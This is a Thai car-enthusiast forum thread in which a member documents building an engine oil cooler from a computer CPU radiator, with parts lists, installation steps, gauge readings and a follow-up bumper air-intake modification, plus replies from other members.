ตอบ
riper_zero


เข้าร่วม: 25 กุมภา 2011
ตอบ: 181

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 228
ให้คำขอบคุณ: 88

ที่อยู่: เมืองทองธานี
ปี: 2002
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อังคาร, 6 พฤษภาคม 2014 03:41 - DIY Engine Oil Cooler
กระทู้ DIY แต่เหมือนมาเล่าให้ฟัง

 "จุดเริ่มต้น"

        เกิดจากเมื่อปีก่อน ได้ไปติดตั้ง เกจ์ มา 1 ชุดประกอบด้วย Volt, water temp ,Oil press , Oil temp ปัญหาเลยตามมาทันที คือเวลานึกสนุกบนทางด่วนถนนว่างๆหลังเที่ยงคืน ก็ลองกระทืบคันเร่งแช่รอบที่เกือบๆ 7 พัน เกจ์ oil temp ก็กวาดขึ้นจากระดับปรกติที่ประมาณ 100 องศาไปเป็น 120 องศา ในระยะทางไม่ถึง 10 กม. เสียงเตือนของเกจ์ที่ตั้งเตือนไว้ที่ 120 องศาก็ดังสนั่นหวั่นไหวจนต้องยกเท้าขึ้นโดยฉับพลัน พร้อมกับอารมณ์เซ็งขึ้นมาทันที

DIY  Engine Oil Cooler

        เลยเกิดความคิดว่าน่าจะหา Oil cooler ติดซักชุด (เพื่อนที่นั่งไปด้วยบอก ก็ถอดเกจ์ออกดิจะได้จบ ดูความคิดมัน) ก็เริ่มหาข้อมูลมาซักระยะแบบไม่ได้จริงจังอะไรมาก เห็นมีชุดสำเร็จขายอยู่หลายยี่ห้อ แต่ที่ไม่ค่อยชอบคือ ทุกยี่ห้อต้องติดตั้งบริเวณหน้าแผงคอยล์ร้อนแอร์ เพื่อแย่งลมเย็นที่ผ่านช่องกันชนที่เล็กนิเดียว ซึ่งอาจทำให้การระบายความร้อนของแอร์และหม้อน้ำแย่ลง ก็เลยพักโครงการไประยะหนึ่ง จนกระทั่งวันหนึ่งไปย้ายของจากห้องเก็บของแล้วบังเอิญไปเจอเจ้าสิ่งนี้ 


DIY  Engine Oil Cooler
DIY  Engine Oil Cooler

      ตามรูปด้านบน มันคือหม้อน้ำสำหรับระบายความร้อน CPU คอมพิวเตอร์(ใครที่เล่น overclock น่าจะรู้จักดี)ตั้งแต่สมัยเรียนมหาลัย ไม่อยากไล่ปีเลยนานอยู่ แต่สภาพยังดีใช้ได้ และสามารถติดพัดลมขนาด 12 ซม.ได้ ไม่จำเป็นต้องติดตั้งไว้หน้าแผงแอร์  ก็เลยเป็นแรงกระตุ้นให้เริ่มโครงการ Oil cooler อีกครั้ง จากการนั่งมองหม้อน้ำตัวนี้ซักพัก ความคิดต่างๆก็เข้ามาในหัวมากมาย ข้อดี-ข้อเสีย เพิ่มขึ้นเรื่อยๆ จนเริ่มกังวล ทั้งหลายทั้งปวงสรุปมาเป็นข้อสงสัยที่กังวลอยู่ 3 ข้อใหญ่ ๆ
       1.ขนาดท่อทองแดงของหม้อน้ำ 8 mm. เพียงพอต่อการไหลของน้ำมันเครื่อง ทั้งระบบหรือไม่
          ได้คำตอบช่างเครื่อง : ไม่น่ามีปัญหาท่อส่งน้ำมันเครื่องในเครื่องเล็กกว่านี้ตั้งเยอะ 
       2.หม้อน้ำจะทนแรงดันได้หรือไม่
          ได้คำตอบจากช่างตีหม้อน้ำว่า : ท่อทองแดงขนาดนี้ ความหนาขนาดนี้ น่าจะทนแรงดันได้ไม่เกิน 10.0 บาร์ 
         
ข้อ 2 นี้ผมสรุปเอาเองว่าใช้ได้เพราะว่า ปรกติสตาร์ทรถตอนเครื่องเย็นแรงดันน้ำมันเครื่องสูงสุดก็ไม่เกิน 6.0 บาร์
       3.หลังจากติดตั้งเสร็จ แรงดันทั้งระบบจะลดลงขนาดไหน
          ข้อนี้ผมทำใจไว้แล้ว เพราะจะรู้ก็ต่อเมื่อติดตั้งเสร็จ รอดูเกจ์แรงดันหลังติดตั้ง ถ้าดี ก็ใช้ต่อ ถ้าแย่ก็ถอดออกปิดโปรเจคไป
    เมื่อตอบคำถามตัวเองได้หมด ก็เริ่มกันเลย

Project  : Engine Oil Cooler version 1 

อุปกรณที่ต้องหาเพิ่ม
1.อแดปเตอร์ oil cooler 
2.ชุดข้อต่อทองเหลืองต่างๆ(ผมจำขนาดไม่ได้ทุกตัวนะครับ แต่ต่อออกจากอแดปเตอร์ และไปจบที่หางปลาเสียบท่อขนาด 5/16")
    2.1 ข้อต่อตรงเกลียวนอกต่อจากอแดปเตอร์ 2 ตัว
    2.2 ข้องอเกลียวใน 90 องศา 2 ตัว 
    2.3 หางปลาเสียบสายขนาด 5/16"(8 mm.) 4 ตัว ใช้ที่อแดปเตอร์ 2 ตัวเชื่อมติดที่หม้อน้ำ 2 ตัว
3.สายน้ำมันทนความร้อนขนาด 5/16" ผมใช้สายน้ำมันเชื้อเพลิง R7 ความยาวไปกลับ 3 m.
4.เข็มขัดรัดสายยาง 4 ตัว
5.กระดูกงูร้อยสายน้ำมันกันเสียดสีกับตัวถัง 3 m.
6.แผงออยคูเลอร์ ใช้หม้อน้ำคอมพิวเตอร์ตามที่เกริ่นมา
7.พัดลมแผงออย เบื้อต้นใช้พัดลมเคสคอมพิวเตอร์ขนาด12 cmไปก่อน
8.เหล็กรูสำหรับยึดแผงออย 
9.น๊อตยึดต่างๆ
10.กาวทาปะเก็น
11.ผ้าพันเกลียว

มาเริ่มติดตั้งกัน
1.นำแผงออย ไปเชื่อมหางปลาเสียบสาย และเช็ครั่ว ต่างๆ (ทำโดยช่างผู้ชำนาญ)
  DIY  Engine Oil Cooler

2.นำพัดลมมาประกอบกับแผงออย
  DIY  Engine Oil Cooler

3.นำแผงออยไปติดตั้งกับตัวรถ(ติดตั้งได้ด้วยตัวเอง)
   3.1 ถอดกันชนหน้ารถออก
   3.2 ตำแหน่งที่ติดตั้งคือด้านหน้าฝั่งคนขับ จะมีพื้นที่ว่างอยู่ 
   3.3 ยึดแผงออยเข้ากับตัวถังรถ ด้วยเหล็กรู ตามความเหมาะสม แต่ต้องแข็งแรง
 
DIY  Engine Oil Cooler
4.ประกอบข้อต่อทองเหลืองเข้ากับอแดปเตอร์ตามรูป ใช้ผ้าพันเกลียวพันทุกจุดที่ทองเหลืองต่อกับทองเหลือง
  และใช้กาวทาปะเก็นทาเกลียวบริเวณข้อต่อตรงทองเหลืองต่อกับอแดปเตอร์ เพื่อกันรั่ว 

DIY  Engine Oil Cooler
5.นำอแดปเตอร์ไปติดตั้ง  ต่อสายยางจากอแดปเตอร์ไปแผงออยร้อยท่อกระดูกงูป้องกันการเสียดสี  โดยสายจะวางไปตามคานแท่นเครื่อง รัดด้วย cable tir ให้แน่น ข้อควรระวังอย่าไปยึดกับปีกนก เพราะปีกนกเคลื่อนไหวตลอดเวลา ท่อยางจะเสียหาย
DIY  Engine Oil Cooler
   ตำแน่งที่ติดตั้งอแด็ปเตอร์ คือ นำไปแทรกกลางกระหว่างท่อน้ำมันเครื่องกับกรองน้ำมันเครื่อง ซึ่งมีพื้นที่จำกัดมาก  กว่าจะได้ทิศทางที่ลงตัว ผมต้องเสียค่าข้อต่อทองเหลืองไปเยอะเหมือนกัน หลังจากติดตั้งอแดปเตอร์ได้ ก็มีปัญหาตามมา 2 อย่าง คือ  1.เมื่อนำเซ็นเซอร์ Oil temp มาใส่กับอแดปเตอร์ตัวนี้ เกิดการยัน ขันเกลียวได้ไม่สุด ตอนแรกช่างจะตัดให้สั้นลง แต่ผมกลัวว่าการวัดค่าจะเพี้ยน แต่ปัญหานี้แก้ได้แบบงงๆปนฟลุ๊กเหมือนกัน คือ ผมให้ลองถอดเซ็นเซอร์ Water temp มาเทียบ ปรากฎว่า เซ็นเซอร์ Water tempสั้นกว่า 4 mm. เลยจับสลับกันเลย ใส่ได้พอดี จบไปหนึ่งเรื่อง
 2.เซ็นเซอร์ Oil Press ที่มีขนาดใหญ ไม่สามรถติดตั้งในตำแหน่งเดิมที่วัดแรงดันออกจากปั๊มน้ำมันเครื่องได้ จึงต้องสลับตำแหน่งกับเซ็นเซอร์ Oil temp  ซึ่งเป็นการวัดแรงดันจากแผงออยมาเข้ากรอง แทน 

6.ต่อสายไฟพัดลม พัดลมที่ใช้กินกระแสไฟประมาณ 0.5 แอมป์ จึงไม่จำเป็นต้องต่อรีเลย์เพิ่ม แต่ปัญหาคือจะต่อไฟมาจากไหนละ
    ถ้าต่อมาจากพัดลมหม้อน้ำ เมื่อขับรถเร็วๆ ลมผ่านเยอะน้ำไม่ร้อน พัดลมก็ไม่ทำงาน
    ถ้าต่อจากพัดลมแอร์ ถ้าอยากซิ่ง ต้องปิดแอร์ พัดลมก็ไม่ทำงาน
    ถ้าต่อสวิทย์แยก ก็ไม่อยากมาปิดเปิดบ่อย 
    ช่างเริ่มเซ็งแระ ผมเลยให้ต่อจากพัดลมแอร์ไว้ก่อน 

เป็นอันเสร็จเรียบร้อยในขั้นตอนติดตั้ง


ต่อไปเป็นผลการทดสอบ ลุ้นเหมือนกัน

-เริ่มสตาร์ทครั้งแรก ปรากฎว่ารั่วครับ บริเวณระหว่างข้อต่อทองเหลืองกับอแดปเตอร์(ครั้งแรกยังไม่ได้อัดกาว) ต้องรื้อออกอัดกาว ใจแป้วเหมือนกันนึกว่าต้องจบโปรเจ็คซะแล้ว
-สตาร์ทครั้งสอง ไม่รั่ว ใจเริ่มดีขึ้น ดับเครื่อง เช็คระดับน้ำมันเครื่องแล้วเติมน้ำมันเครื่องเพิ่มประมาณครึ่งลิตรได้
-เมื่อเช็คทุกอย่างเรียบร้อย ทุกจุดไม่รัั่ว ระดับน้ำมันเครื่องปรกติ ต่อไปลองมาดูแรงดันน้ำมันเครื่องกันปรากฎว่า 
 
   DIY  Engine Oil Cooler

เหลือไม่ถึง 3 บาร์   เร่งเครื่องจนรอบตัดก็ได้ไม่เกินนี้  จากก่อนติดตั้ง เกือบ 6 บาร์ ทำไมหายไปเยอะจัง



อึ้งไปแป๊บนึง ในใจคิดว่า เอาแล้ว เสียเงิน เสียเวลา ฟรีแน่เลย ใจอยู่ที่ตาตุ่ม ต้องรื้อทิ้งแน่เลย
พอเริ่มตั้งสติได้ ก็ลองเก็บข้อมูลไว้หน่อยเผื่อไว้ปรับปรุง
    เครื่องเย็นสนิท รอบเดินเบา   Oil press 2.7 บาร์  เร่งจนรอบตัด เกือบ 3 บาร์
     ที่ Oil temp 100 องศา รอบเดินเบา Oil press จะอยู่ที่ 1.2 บาร์  เมื่อเร่งเครื่องจนรอบตัด  Oil Press จะอยู่ที่ 2.0 บาร์ 
มีจุดสังเกตว่า แรงดันสวิง ขึ้น-ลงไม่นิ่ง บางครั้งเร่งเครื่องแรงดันลดก็มี เลยถามช่างที่ติดตั้งได้คำอธิบายว่า น่าจะเกิดจากเซ็นเซอร์Oil Press ติดตั้งในทิศทางขวางทางเดินน้ำมันเครื่อง ทำให้น้ำมันเครื่องไหลไม่นิ่ง แรงดันที่วัดได้เลย ขึ้นๆลงๆ

ตรงนี้สำคัญ
ผมถามต่อว่าแล้วแรงดันขนาดนี้ พอที่จะหล่อลื่นภายในเครื่องหรือไม่
ช่างเปิดฝาน้ำมันเครื่อง เร่งเครื่อง แล้วมองไปช่องฝา แล้วตอบสั้นๆว่า พอแน่นอน
DIY  Engine Oil Cooler

ช่างคงเห็นผมงงๆ เลยนำกระดาษทิชชู่ซ้อนกันหลายๆแผ่น แล้วมาอุดช่องเติมน้ำมันเครื่อง แล้งเร่งเครื่องเต็มที่ กระดาษทิชชู่เปียกชุ่มด้วยน้ำมันเครื่องที่กระเด็นออกมา ช่างบอกว่าถ้าน้ำมันเครื่องขึ้นมาบนวาล์วเยอะขนาดนี้ พอแน่นอน (ไม่ห็นช่างจะสนใจแรงดันที่เกจ์เท่าไรเลย)  เอาวะ พอก็พอเป็นไงเป็นกัน พังก็พัง จะได้รู้กันไป
 แทรกรูป วิธีการที่ช่างใช้ตรวจสอบ ผมทำให้ดู เอากระดาษทิชชู่ซ้อนกันหลายๆชั้นปิดแทนฝาน้ำมันเครื่องแล้วเร่งเครื่อง 

DIY  Engine Oil Cooler
น้ำมันมันบางส่วนจะกระเด็นมาถูกกระดาษทิศชู่จนชุ่มทุกแผ่น แสดงว่าภายในฝาวาล์มีน้ำมันเครื่องเยอะเพียงพอต่อการหล่อลื่น


DIY  Engine Oil Cooler

-ประกอบเสร็จบ่าย ตอนเย็นขับรถจากเมืองทองธานี ไปทำธุระที่อุทัยธานีเลยทันที อากาศวันนั้นที่จำได้ร้อนมาก พอขึ้นทางด่วนเมืองทองได้ได้ก็กดเลย ความร้อนเริ่มต้น90องศาและเพิ่มขึ้นเรื่อยๆแต่ช้ากว่าก่อนติดตั้งอย่างชัดเจน แรงดันสวิงขึ้นลงที่ 2 บาร์  
-กดคันเร่งแช่ 6500 รอบยาวๆเกจ์มาร้องเตือนอุณหภูมิ120 องศาตอนก่อนถึงทางออก ม.ธรรมศาสตร์ รังสิต แรงดันอยู่ที่ 1.7 บาร์และยังสวิงขึ้นลง ระยะทางที่วิ่งเกือบ 20 กม.(แช่รอบได้ยาวกว่า ตอนก่อนติดตั้งแล้ว) เลยยกคันเร่ง และวิ่งวอร์มดาวน์จนสุดทาง ความร้อนลดลงเหลือประมาณ 105 องศาได้  
-พอเข้าถนน 347  บางปะหัน เจอ BMW ป้ายแดงแซงไป ตบะแตกอีกครั้ง วิ่งตามไปแบบติดๆ จนเกจ์ร้องอีกครั้ง รถไม่เยอะเลยถ่ายถ่ายรูปไว้ได้แบบเบลอๆหน่อย 
DIY  Engine Oil Cooler

   หลังจาก หาข้อมูลด้วยตนเอง ถามผู้เชี่ยวชาญเฉพาะทาง ลองผิดลองถูก และความใจกล้า จนเกิดเป็นโปรเจคนี้ขึ้นมาได้ และ ผลลัพท์ที่ได้ ก็ตอบโจทย์ที่ตั้งไว้ได้ดี ระดับที่ยอมรับได้ แต่ปัญหาที่เกิดขึ้นก็ต้องปรับปรุง แก้ไขต่อไป

ขอจบ Project : Engine Oil Cooler version 1 ตรงนี้ครับ



ถ้าใครอ่านแล้วยังไม่เวียนหัวจนอ้วก เชิญอ่านต่อ version 1.1 , 1.2 , 1.3ด้านล่างครับ 
 


แก้ไขล่าสุดโดย เมื่อ ศุกร์, 19 ธันวา 2014 01:11, ทั้งหมด 15 ครั้ง (ดูทั้งหมด)
Jasada


ชื่อเล่น: เป็นเต้

เข้าร่วม: 10 มกรา 2011
ตอบ: 571

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 520
ให้คำขอบคุณ: 693

ที่อยู่: 15/41 ม.3 ต.เนินพระ อ.เมือง จ.ระยอง
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 6 พฤษภาคม 2014 05:48 - DIY Engine Oil Cooler
รอชมคับ
ได้รับคำขอบคุณจาก: karnmotocross01  riper_zero  Wuttikri Boonlert 
karnmotocross01


ชื่อเล่น: กานต์

เข้าร่วม: 01 กันยา 2012
ตอบ: 1477

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 814
ให้คำขอบคุณ: 34349

ที่อยู่: อ.หนองมะโมงจ.ชัยนาท
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 6 พฤษภาคม 2014 07:47 - DIY Engine Oil Cooler
สุดยอดครับ..รอชม
ได้รับคำขอบคุณจาก: riper_zero  Athip Charl Klahan  Wuttikri Boonlert 
TUNG11


ชื่อเล่น: ต้อง

เข้าร่วม: 31 พฤษภาคม 2012
ตอบ: 617

Guru ES
Guru ES

ได้รับคำขอบคุณ: 345
ให้คำขอบคุณ: 360

ที่อยู่: บางปะกง 8 ริ้ว
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 6 พฤษภาคม 2014 15:32 - DIY Engine Oil Cooler
..
ได้รับคำขอบคุณจาก: karnmotocross01  riper_zero  Wuttikri Boonlert 
GAMEZA443


ชื่อเล่น: เกมส์

เข้าร่วม: 06 ตุลา 2013
ตอบ: 185

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 85
ให้คำขอบคุณ: 51

ปี: 2001
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 6 พฤษภาคม 2014 19:32 - DIY Engine Oil Cooler
....
ได้รับคำขอบคุณจาก: karnmotocross01  riper_zero  Athip Charl Klahan  Wuttikri Boonlert 
riper_zero


เข้าร่วม: 25 กุมภา 2011
ตอบ: 181

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 228
ให้คำขอบคุณ: 88

ที่อยู่: เมืองทองธานี
ปี: 2002
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พฤหัส, 8 พฤษภาคม 2014 00:20 - DIY Engine Oil Cooler
Engine Oil Cooler version 1  จบแล้วนะครับ เชิญวิจารณ์ และ เสนอแนะได้เต็มที่ 
และเร็วๆนี้จะนำ version 1.1 มาลงต่อ ขอรวบรวมรูปก่อน
ได้รับคำขอบคุณจาก: Athip Charl Klahan  Wuttikri Boonlert 
Saka


ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1873

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1996
ให้คำขอบคุณ: 5358

ที่อยู่: พุทธมณฑลสาย4
ปี: 2001
พฤหัส, 8 พฤษภาคม 2014 08:34 - DIY Engine Oil Cooler
เป็นโปรเจคที่เป็นประโยชน์มาก ผมไม่กล้าติดเกจวัดออยก็เพราะเหตุผล 2 อย่าง คือ กลัวรั่ว กะกลัว(รู้ว่า)ร้อน
ขอแสดงความเห็นนะครับ ถ้าเกจสามารถต่อสัญญาณเตือนออกมาได้ (รุ่นที่สามารถติดชิปไลท์) ผมว่าน่าจะนำสัญญาณเตือนนี้ไปเป็นตัวสั่งพัดลมออยทำงานได้นะครับ และถ้าตั้งพีคได้ยิ่งดีเพราะเท่ากับว่าจะสามารถตั้งอุณหภูมิที่สั่งให้พัดลมทำงานได้เลย
อีกอย่างน่าจะหาตำแหน่งติดเซ็นเซอร์วัดแรงดันน้ำมันเครื่องใหม่ เพื่อให้เกจได้แสดงค่าที่ถูกต้องและเซนเซอร์ไม่ได้เป็นตัวการที่ทำให้แรงดันน้ำมันตก
ได้รับคำขอบคุณจาก: riper_zero  karnmotocross01  Athip Charl Klahan  Wuttikri Boonlert 
riper_zero


เข้าร่วม: 25 กุมภา 2011
ตอบ: 181

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 228
ให้คำขอบคุณ: 88

ที่อยู่: เมืองทองธานี
ปี: 2002
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พฤหัส, 8 พฤษภาคม 2014 10:23 - DIY Engine Oil Cooler
Saka พิมพ์ว่า:
เป็นโปรเจคที่เป็นประโยชน์มาก ผมไม่กล้าติดเกจวัดออยก็เพราะเหตุผล 2 อย่าง คือ กลัวรั่ว กะกลัว(รู้ว่า)ร้อน
ขอแสดงความเห็นนะครับ ถ้าเกจสามารถต่อสัญญาณเตือนออกมาได้ (รุ่นที่สามารถติดชิปไลท์) ผมว่าน่าจะนำสัญญาณเตือนนี้ไปเป็นตัวสั่งพัดลมออยทำงานได้นะครับ และถ้าตั้งพีคได้ยิ่งดีเพราะเท่ากับว่าจะสามารถตั้งอุณหภูมิที่สั่งให้พัดลมทำงานได้เลย
อีกอย่างน่าจะหาตำแหน่งติดเซ็นเซอร์วัดแรงดันน้ำมันเครื่องใหม่ เพื่อให้เกจได้แสดงค่าที่ถูกต้องและเซนเซอร์ไม่ได้เป็นตัวการที่ทำให้แรงดันน้ำมันตก


ขอบคุณสำหรับคำแนะนำนะครับ ผมอธิบายตามความเข้าใจนะครับ ผิดถูกโปรดชี้แนะ
-เกจผมเตือนทั้งเสียงและไฟครับ ถ้าใช้เป็นนสวิทเปิดรีเลย์พัดลม ก็น่าสนใจ แต่ติดปัญหาตรงที่ ช่างอิเล็กโทรนิคทั่วไปไม่กล้าเปิดฝาเกจ์กลัวไม่จบ เคยจะเปลี่ยหลอดled อย่างเดียวถามช่างที่เชี่ยวชาญค่าเปิดก็ 600 บาทยังไม่รวมอะไหล่ น่าจะไม่คุ้มกับเงินครับ เคยหาข้อมูลจะนำหม้อน้ำมอเตอร์ไซค์ sonic มาทำแผงออยเพราะมี เทอร์โมสตัทฝังในหม้อน้ำสามารถสั่งพัดลมทำงานได้เอง แต่ติดปัญหาเรื่องขนาด และการดัดแปลง
-เนื่องจากพื้นที่การวางอแดปเตอร์จำกัดมาก. ความเป็นไปได้ที่จะติดเซนเซอร์ oil press ที่ตำแหน่งเดิม จะต้องนำอแดปเตอร์เฉพาะสำหรับ oil press,oil temp มาติดตั้งก่อน การต่ออแดปเตอร์สองตัวซ้อนกัน มีความเสี่ยงสูงที่จะรั่ว เลยยังไม่ได้แกัไขครับ
-สำหรับทิศทางการวางเซนเซอร์ oil Press ที่ขวางทางเดินน้ำมัน ผมคิดว่ามีผลต่อการสวิงขึ้นลงของเกจ์ แต่การที่ pressure drop เกิดจากการติดแผงออยแน่นอนครับ


ผมแนะนำคุณ saka. ถ้าติดเกจ์ oil temp,oil press ส่วนใหญ่จะรั่วที่โอริงอแดปเตอร์ ให้เปลี่ยนโอริงเป็นชนิด viton (ของเดิมที่ติดมาเป็น NBR) ซึ่งจะทนอุณหภูมได้สูงกว่า ใช้ได้นานกว่า แต่ราคาประมาณวงละ 100 บาท ผมเปลี่ยนน้ำมันเครื่องหลายครั้งยังไม่รั่วเลย
ได้รับคำขอบคุณจาก: Saka  wasan_ceo  nayyai1  karnmotocross01  jeang  Thetom  Wuttikri Boonlert 
riper_zero


เข้าร่วม: 25 กุมภา 2011
ตอบ: 181

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 228
ให้คำขอบคุณ: 88

ที่อยู่: เมืองทองธานี
ปี: 2002
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 9 พฤษภาคม 2014 00:37 - DIY Engine Oil Cooler
Engine Oil Cooler version 1.1 
   
    "แหกกฎ"

  มาต่อกันที่ version 1.1  ที่ตั้งชื่อนี้เพราะว่าเป็นการต่อยอดจากversion แรกแต่ยังใช้อุปกรณหลักๆเหมือนเดิม

  เกริ่นนำ(อีกแล้ว)
            หลังจากทำ version 1 เสร็จก็ใช้งานไประยะหนึ่งประมาณ 2000 กม.ได้ ก็ใช้งานได้ปรกติ แต่ขับทำงานอย่างเดียวไม่ได้แซดเลย แต่ด้วยกิเลสที่อยู่ในตัวยังไม่หยุดทำงานจึงเกิดความต้องการอีกแล้ว คราวนี้ตั้งโจทย์ว่าอย่ากให้ Oil temp ขึ้นช้ากว่านี้อีกหน่อย จึงเริมศึกษาที่ทิศทางการระบายลม ก้มๆเงยๆหน้ากันชนอยู่ ชั่วโมงกว่า(เก็บข้อมูล 5 นาทีที่เหลือหน้ามืดเป็นลม)เพื่อหาว่า เมื่อประกอบกันชนเข้าไปแล้วลมที่มาผ่านแผงออยมาจากไหน จะว่ามาจากช่องใต้บังโคลนก็ไม่ใช่เพราะช่องมันอยู่หลังแผงออย ลมไม่มีทางย้อนได้ ดูที่หน้าแผงแอร์ก็ไม่มีช่องเข้า เลยถอดกันชนออกดูปรากฎว่า ทิศทางที่เป็นไปได้คือ ลมเย็นจากด้านหน้ารถต้องผ่านแผงแอร์ก่อนแล้วถึงถูกพัดลมแผงออยดูดมาระบายความร้อน แสดงว่าลมก็ต้องได้ความร้อนจากแผงแอร์มาแล้ว ตนทางก็ร้อนแล้วปลายทางก็แย่ลงแน่นนอน จึงมีความคิดจะทำ บายพาส ให้ลมเย็นจากหน้ารถเข้าแผงแอร์ ถึงตรงนี้คงเดาได้แล้วใช่ไหมครับว่าผมจะทำอะไร(ตัดสินใจอยูนานมาก เพราะตั้ง concept ไว้ว่าจะสร้างไม่ใช่ทำลาย แต่ด้วยประสิทธิภาพต้องยอมแหก)ใช่ครับมันคือ
        ท่อดักอากาศ(Air intake pipe) แต่ใช้แค่ปากท่อที่เป็นอลูมิเนียมท่อยืดไม่ใช้ ตื้อพนักงานขายตั้งนานกว่ายอมขาย ขนาดใหญ่ที่สุดหาได้ในตลาดพูลทรัพย์วันนั้นคือ 3.5 " 

มาเริ่มติดตัง(เอ้ย ติดตั้ง)กัน(รูปประกอบอยู่ด้านล่าง)
    1.เนื่องจากอ้อนวอนขอซื้อแยกมา ไม่ได้อะไรมาเลยนอกจากปากท่อ ถุงเถิงอะไรก็ไม่ใส่ให้ เดินถือทั่วตลาดเหมือนหัวขโมยเลยจึงไม่ต้องถามถึงแบบสำหรับเจาะ   เลยใช้สิ่งที่มีเนี่ยแหระเป็บแบบ ก่อนวาดแบบก็ติดกระดาษกาวหลายๆชั้นจะได้วาดติด ม่ายยยช่าย เวลาเจาะสีจะได้ไม่แตกผมจำเค้ามานะครับไม่ได้มีทฤษฎีอะไรรองรับ
       1.1 ข้อนี้ต้องระวัง การเจาะทำได้หลายวิธี แต่วิธีที่ผมเลือกใช้คือใช้สว่านดอกเล็กเจาะเป็นรูวนไปตามเส้นวงกลมจนรอบ ซึ่งวิธีนี้จุดสำคัญต้องเผื่อระยะรัศมีของดอกสว่าน คือถ้าเราเจาะพอดีที่เส้นเลยเมือรวมกับรัศมีของดดอกสว่านก็จะใหญ่เกินไป หลวมครับอธิบายแค่นี้นะครับ มากว่านี้เดี๋ยวงงเอง

[img]https://scontent-b-sin.xx.fbcdn.net/hphotos-xfp1/v/t1.0-9/10325322_1399517173664446_8654571130797425004_n.jpg?oh=541f9abe827b2df0ff36cfc63e1966cc&oe=55478E6A[/img]
 
   2.(รูปประกอบอยู่ด้านล่าง)จริงข้อนี้ต้องทำก่อนข้อ 1 แต่ถ้าผมเอารูปนี้ขึ้นก่อนท่านจะงงว่าผมทำอะไร นั่นคือการหาตำแหน่งในการเจาะให้พอดีกับแผงออย ต้องหาจุดอ้างอิงที่เมื่อประกอบกันชนเข้าไปแล้วยังอยู่ที่เดิม ผมใช้ขอบล่างของโคมไฟหน้าเป็นจุดอ้างอิง เมื่อประกอบกันชนเข้าไปก็ถ่ายระยะที่วัดไว้ลงบนกันชนจะพอดีเดะๆๆเลย ขยับซ้าย-ขวาได้เพื่อความสวยงาม(ในรูปเป็นมือของผู้ช่วยนะครับ )
DIY  Engine Oil Cooler

   3.เมื่อวาดแบบเสร็จก็เริ่มเจาะแบบใจเย็นๆๆ  อย่าใช้แรงกดมากเพราะเดียวตอนทะลุ สว่านจะลงไปกระแทรกสีเสียหาย เจาะเสร็จก็หาตะไบมาขัดแต่งให้เข้ารูปแล้วจึงยัดปากท่อลงไป(รูปอยู่ด้านล่าง)

ใจเย็นเจาะไปเรื่อยๆ อากาศร้อนก็หาหาอะไรมาจิบเย็นๆ

[img]https://scontent-b-sin.xx.fbcdn.net/hphotos-xfp1/v/t1.0-9/10325322_1399517173664446_8654571130797425004_n.jpg?oh=541f9abe827b2df0ff36cfc63e1966cc&oe=55478E6A[/img]

เจาะรอบแล้ว ยิงไปเกือบร้อยรู
[img]https://scontent-a-sin.xx.fbcdn.net/hphotos-xfa1/v/t1.0-9/10155849_1399517196997777_3404120432312382564_n.jpg?oh=4098d2c4094e92210a9344c2dd7fbfc7&oe=5544E655[/img]

ต้องใช้ตะไบขัดแต่งให้เรียบ

[img]https://fbcdn-sphotos-a-a.akamaihd.net/hphotos-ak-xpa1/v/t1.0-9/10298886_1399517213664442_5450968550758971628_n.jpg?oh=dd81a203ef9f6c322e1594b44fd02262&oe=5539754F&__gda__=1426541093_90c623496a05a7eefed157f2b4ecf91c[/img]
4.เมื่อขัดแต่งเรียบร้อยก็ยัดปากท่อลงไป ตรงนี้มีขั้นตอนเพิ่มคือปากท่อดักอากาศยาวเกินไป จึงชนกับแผงออย เลยถอดออกมาตัด แล้วใส่ใหม่ 
[img]https://scontent-b-sin.xx.fbcdn.net/hphotos-xap1/v/t1.0-9/10269465_1399517256997771_3448789019472598093_n.jpg?oh=c5fe4a2d72593480b0329bd544817c5a&oe=54F9E238[/img]
  5.รู้สึกว่ามันโล่งไป กลัวเศษหิน เศษใบไม้จะเข้าไปกระแทกแผงออย หันซ้ายหันขวาไปเจอตาข่ายกั้นเล้าไก่ชนของพ่อแฟน เลยไปแอบตัดมาซักหน่อย(ป่านนี้ไก่ชนคงวิ่งกันเกลื่อนหมู่บ้านแล้ว) ซ้อนสองชั้น รัดให้แน่นด้วย สายรัดอภินิหารร้อยแปด(cable tie)

 [img]https://fbcdn-sphotos-b-a.akamaihd.net/hphotos-ak-xpf1/v/t1.0-9/10300908_1399517273664436_3869852502639890277_n.jpg?oh=cac2a798e5192654d993814035cc7cdc&oe=54FAEE78&__gda__=1426190663_cd078a0c1895feb728b4c3e15eb07199[/img]
เสร็จแล้วครับสำหรับการติดตั้ง
[img]https://fbcdn-sphotos-f-a.akamaihd.net/hphotos-ak-xap1/v/t1.0-9/10320383_1399517336997763_2147771362522384845_n.jpg?oh=3cdae4b6093130cee06b1f00c17324ea&oe=554476D0&__gda__=1426878185_56835e26c4b2283110f964859292b74a[/img]



มาดูผลลัพท์ที่ได้กัน
    ขับจากอุทัยธานีมาส่งญาติที่บางกะปิ ตอนสามทุ่มถนนโล่ง แช่ 4500-5000 รอบเกือบตลอดทาง ไม่ถึงสองชั่งโมงถึงบางกะปิ oil temp ตามรูป เพ่งดูหน่อยนะครับ
[img]https://scontent-b-sin.xx.fbcdn.net/hphotos-xpf1/v/t1.0-9/10172605_1401129140169916_4398393890631673903_n.jpg?oh=919891d058fd78a5137ff963a060c8ca&oe=5542E295[/img]
